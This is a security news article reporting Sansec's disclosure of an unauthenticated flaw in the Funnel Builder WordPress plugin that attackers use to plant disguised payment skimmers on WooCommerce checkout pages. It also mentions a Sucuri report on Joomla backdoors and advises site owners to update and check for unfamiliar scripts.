40,000+ E-Commerce Sites Threatened by Unauthenticated Funnel Builder Exploit

A critical security vulnerability has been identified in the Funnel Builder plugin for WordPress, which is actively being exploited to inject malicious JavaScript into WooCommerce checkout pages. This vulnerability aims to steal payment data from users. Sansec, a Dutch e-commerce security company, has published details of this activity, noting that the flaw affects all versions of the plugin before 3.15.0.3. The plugin is widely used, with over 40,000 WooCommerce stores relying on it. The vulnerability allows unauthenticated attackers to inject arbitrary JavaScript into checkout pages, posing a significant risk to e-commerce sites using the plugin. FunnelKit, the company maintaining Funnel Builder, has responded by releasing a patch in version 3.15.0.3 to address the issue. The attackers exploit the plugin by inserting fake Google Tag Manager scripts into its 'External Scripts' setting, which appear as ordinary analytics tags but actually load a payment skimmer to steal sensitive information like credit card details and billing addresses. Sansec explains that the vulnerability stems from a publicly exposed checkout endpoint in Funnel Builder, which allows incoming requests to select internal methods to run. Older versions of the plugin did not verify the caller's permissions or restrict the methods that could be invoked, creating a loophole for attackers. By exploiting this, attackers can issue unauthenticated requests to inject malicious code into the plugin's global settings, which is then executed on every checkout page. The impact of this vulnerability is severe, as attackers can plant a malicious script tag that activates during every checkout transaction on affected WordPress sites. Sansec has observed instances where the payload disguises itself as a Google Tag Manager loader, launching JavaScript from a remote domain. This script establishes a WebSocket connection to the attacker's command-and-control server to retrieve a skimmer tailored to the victim's storefront, with the ultimate goal of stealing personal and payment information. Site owners are advised to update their Funnel Builder plugin to the latest version and review their settings for any unfamiliar scripts, removing them if necessary. The tactic of disguising skimmers as Google Analytics or Tag Manager code is a common pattern used by attackers, as it often goes unnoticed by reviewers who overlook familiar-looking tracking tags. This disclosure follows a recent campaign detailed by Sucuri, where Joomla websites were backdoored with obfuscated PHP code to contact attacker-controlled servers. These servers send instructions to the compromised sites, allowing attackers to inject spam content or redirect visitors without the site owner's knowledge. This method enables attackers to alter the behavior of the infected site dynamically, without needing to modify local files repeatedly. The approach used in both the WordPress and Joomla attacks highlights a broader trend in cyber threats, where attackers leverage trusted platforms to execute their malicious activities. By exploiting vulnerabilities in widely-used plugins and content management systems, they can compromise numerous sites and collect valuable data, underscoring the importance of regular updates and vigilant security practices for website owners.